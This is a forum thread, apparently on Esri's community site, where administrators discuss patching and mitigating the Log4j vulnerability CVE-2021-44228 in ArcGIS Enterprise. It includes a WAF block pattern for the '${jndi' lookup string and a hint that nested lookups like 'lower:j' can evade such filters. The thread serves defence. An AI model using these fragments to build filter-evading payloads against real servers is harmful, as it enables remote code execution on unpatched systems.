Community

ArcGIS Enterprise Log4j Vulnerability (CVE-2021-44228) Patch or Mitigation?

47075
162
Jump to solution
12-11-2021 09:13 AM
Carl_Flint
by
New Contributor III
‎12-11-2021 09:13 AM

Good afternoon, is there any patches in the works or potential mitigation steps for the latest java log4j vulnerability (CVE-2021-44228)?  I know that GeoEvent server uses log4j and can assume some other enterprise server's or portal potentially do as well.  Any help would be appreciated in resolving this zero-day.

Thanks,

Carl Flint, GISP
162 Replies
RandallWilliams
by Esri Regular Contributor
Esri Regular Contributor
‎12-14-2021 07:50 AM

Restating under my Esri profile for clarity:

 

Please continue to follow the advisory we've published. There have been and will continue to be updates as the day progresses.

 

We have spent considerable time performing internal security testing, and there is no evidence of any proven exploit vectors for remote code execution (RCE) in any version of a base ArcGIS Enterprise deployment (including ArcGIS Server, Portal for ArcGIS, and ArcGIS Data Store). This means that while several components of ArcGIS Enterprise incorporate different versions of Log4J across all versions of ArcGIS Enterprise, there are no known ways to exploit this vulnerability. 10.8.x is mitigated: ArcGIS Enterprise versions 10.8 and higher use newer versions of the Java Runtime Environments (JRE) that do not allow for execution of remotely loaded code. On these versions of ArcGIS Enterprise, even hypothetical future remote exploit vectors are presumed to be mitigated.

Please continue to refer to the advisory we've posted as the source of truth from Esri regarding this evolving issue. 

JohnBrockwell
by
Occasional Contributor III
‎12-14-2021 06:03 AM

Getting Off Topic. Please keep it to:
Log4j Vulnerability (CVE-2021-44228)

rshihab
by
New Contributor III
‎12-14-2021 06:13 AM

Hi John

does the WAF applied to the ArcGIS enterprise hosted locally or just to azure . does applying . do the  attached settings below enough

 

rshihab_0-1639491169793.png

 

Ramla Shihab
0 Kudos
JohnBrockwell
by
Occasional Contributor III
‎12-14-2021 06:34 AM

I am not taking that remediation action(s). I am getting all my environments to 10.8.1. I was in pretty good shape to begin with.

 

The one piece of advice I would give is don't fret about an outage. Accept a short term outage to avoid a long term one.

0 Kudos
RandallWilliams
by Esri Regular Contributor
Esri Regular Contributor
‎12-14-2021 06:54 AM

blocking stings like ${jndi will mitigate this issue. 

ChristophK
by
New Contributor II
‎12-14-2021 08:21 AM

WAF filters like that can be easily circumvented with other nested filters, like lower/uppercase functions (lower:j, lower:n ...)

It won't allow me to post an example, but I hope the idea is clear.

0 Kudos
berniejconnors
by
Occasional Contributor III
‎12-14-2021 08:51 AM

You can type your example and then do a screen capture and include the image in your post instead of the text.

berniejconnors_0-1639500650940.png

 

0 Kudos
ChristophK
by
New Contributor II
‎12-14-2021 10:05 AM

Thanks @berniejconnors , here's a screenshot of what I mean. I found these two examples in a Twitter post by user @ entropyqueen_.


ChristophK_0-1639504547701.png

 

0 Kudos
RandallWilliams
by Esri Regular Contributor
Esri Regular Contributor
‎12-14-2021 05:03 PM

Yes, but that doesn't change the fact that a WAF is a crucial part of any organization's defense in depth posture. No, a WAF won't eliminate ANY given risk, but security is about risk reduction with an eye toward risk elimination. 

0 Kudos
SebastienPelletier
by
Occasional Contributor
‎12-14-2021 06:29 AM

Question, when we set the variable LOG4J_FORMAT_MSG_NO_LOOKUPS,  do we need to restart the server or ArcGIS Server?

0 Kudos